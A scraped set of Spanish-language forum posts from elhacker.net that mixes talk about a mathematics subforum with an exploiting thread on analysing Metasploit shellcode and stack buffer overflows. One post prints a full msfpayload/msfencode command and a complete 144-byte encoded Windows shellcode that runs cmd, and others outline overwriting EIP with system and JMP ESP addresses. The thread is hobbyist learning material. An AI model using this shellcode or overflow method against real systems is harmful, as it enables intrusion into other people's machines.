La escusa de que solo entrarían a pedir tareas sucede igual con todos los demás foros entran a que les hagan los programas y demás chorradas, y es cuestión de los moderadores borrar o cerrar esos temas.

@R.N.A | El pollo Profeta

Deja de estar citando tanto que no se lee bien, borra las citas mas internas que no se necesitan, cualquiera puede seguir las citas si estas le interesan al lector. Por ese tipo de mensajes, buenas iniciativas como estas terminan cerradas y en el olvido.

Saludos

Naa Integrales múltiples para nada, xD. Programar métodos numéricos es lo que voy a haces este semestre.

He programado calculando distancias entre coordenadas GPS a corta distancia y ahora lo uso en el trabajo todos los días, he ahorro horas de analizar datos.

Tambien he hecho un simulador de gravedad llamado NewtonSpace, al cual le agregas N objetos en determindas coordenas (x,y,z) y vectores de velocidad iniciales y las nuevas coordenadas se re-calculan cada X tiempo. Con ello un equipo en la escuela estamos programando un simulador para un instituto de Fisica.

Creo que sdc lo ha dejado mucho claro.

Yo siempre he querido un foro de matemáticas o por lo menos donde tratar temas de Índole similar.

Rara vez me entro en esos subforos
http://foro.elhacker.net/juegos_y_consolas-b19.0/
http://foro.elhacker.net/telefonia_movil-b37.0/
http://foro.elhacker.net/gpsnavegadores-b87.0/

Si existiese un relacionado con matemáticas estaría ahí tal y como estoy en "bugs y exploits".

Saludos

Si tengo el código correcto, es que el mestasploit hace cosas raras en especifico al momento de genera opcodes con msfpayload, en general prefiero crear mis propias shellcodes, sin embargo me pareció interesante analizar una creada por el msf ya que muchos lo usan sin saber que es lo que les arroja verdaderamente

Aqui lo genere:


Y lo estoy analizando aqui:



Se ve que el los opcodes son "\xda\xd0"

y hago un poco de depuración con gdb



Aqui pues las direcciones de stack y otras son las que usa FreeBSD, pero es para darme una idea de lo que hace en general.

Gracias por las referencias, las mirare en un rato mas.

Saludos

Bueno, estoy haciendo una investigación, sobre algunas instrucciones poco usuales de ASM, esto es para el análisis de un shellcode sacado con Metasploit, bueno no encuentro buenas referencias sobre la instrucción: fcmovbe

La tengo así en depurador, es AT&T

fcmovbe %st(0),%st

el original de Intel es:

fcmovbe %st,%st(0)

Muchos tienen problemas par distinguir uno de otro pero bueno, eso no es el tema

He dado con esto:

http://www.asmpedia.org/index.php?title=FCMOVBE

Y con algunos manuales de Intel, pero tienen entre 200 y 500 hojas y pfff de aqui a que leo todo para entenderlo, tengo una ligera idea, pero necesito que alguien me pueda confirmar, st es alguna especie de registro, cual es su proposito general.

Yo entiendo esto:
no Entiendo.

Alguna buena referencia entendible.

Saludos y gracias

ese alpha_mixed solo te devuelve una Shellcode Alfanumerica, por eso te sale asi.

Por lo que veo es bastante facil generar shellcodes xDD

Anon@localhost % msfpayload windows/exec CMD=cmd Raw | msfencode -a x86 -b '\x00' -t c
[*] x86/shikata_ga_nai succeeded, final size 144
 
unsigned char buf[] = 
"\x33\xc9\xb1\x1e\xba\xb1\xfc\x90\xfb\xdd\xc1\xd9\x74\x24\xf4"
"\x5e\x31\x56\x0f\x83\xc6\x04\x03\x56\xba\x1e\x65\x07\x54\x9a"
"\x86\xf8\xa4\xa8\xc2\xc4\x2f\xd2\xc9\x4c\x2e\xc4\x59\xe3\x28"
"\x91\x01\xdc\x49\x4e\xf4\x97\x7d\x1b\x06\x46\x4c\xdb\x90\x3a"
"\x2a\x1b\xd6\x45\xf3\x56\x1a\x4b\x31\x8d\xd1\x70\xe1\x76\x1e"
"\xf2\xec\xfc\x41\xd8\xef\xe9\x18\xab\xe3\xa6\x6f\xf4\xe7\x39"
"\x9b\x80\x0b\xb1\x5a\x7c\xba\x99\x78\x86\x7f\x7e\xb0\x70\x1f"
"\xd7\xd6\xf7\x99\xe7\x9d\x48\x29\x83\xd2\x54\x9c\x18\x7a\x6d"
"\x57\xe6\xf8\xad\x0d\x47\x97\xdd\x5b\x63\x38\x76\xc3\x92\x4c"
"\x88\xa4\x95\xb6\xf6\x27\x0e\x39\xf3";
 

Esa también sirve son 144 bytes

Solo se usa el -e x86/alpha_mixed cuando hay un filtro alfanumérico

Saludos

He ikary, pues no se cual era el problema con los parámetros y el Olly, pero ya ahorita te digo que solo ocupas saber con cuantos bytes sobrescribes EIP y con eso solo ocuparías las direcciones de system y de JMP esp

Con eso he logrado ejecutar el cmd.exe. Claro que tube problemas, lo explico en el post anterior.

a ok, era eso entonces, aunque si para el calc.exe se ocupo 164 bytes por que para el cmd.exe se necesitan 453 xD, segun recuerdo para el cmd.exe se necesita un mínimo de 29 bytes o algo asi recuerdo segun el texto de rojodos que se cita en el mismo documento de ikary.

Eso de general shellcodes mediante herramientas, esta bien cuando tenemos prisa, sin embargo en etapas de aprendizaje es bueno saber de donde vienen.

Seria interesante usar esa misma shellcode que muestras sin nececidad de cambiar el tamaño del buffer del programa vulnerable

Saludos

Hola que tal H-PHAMTOM

Una preguntilla, por que cambiar el buffer de 300 a 700?

Saludos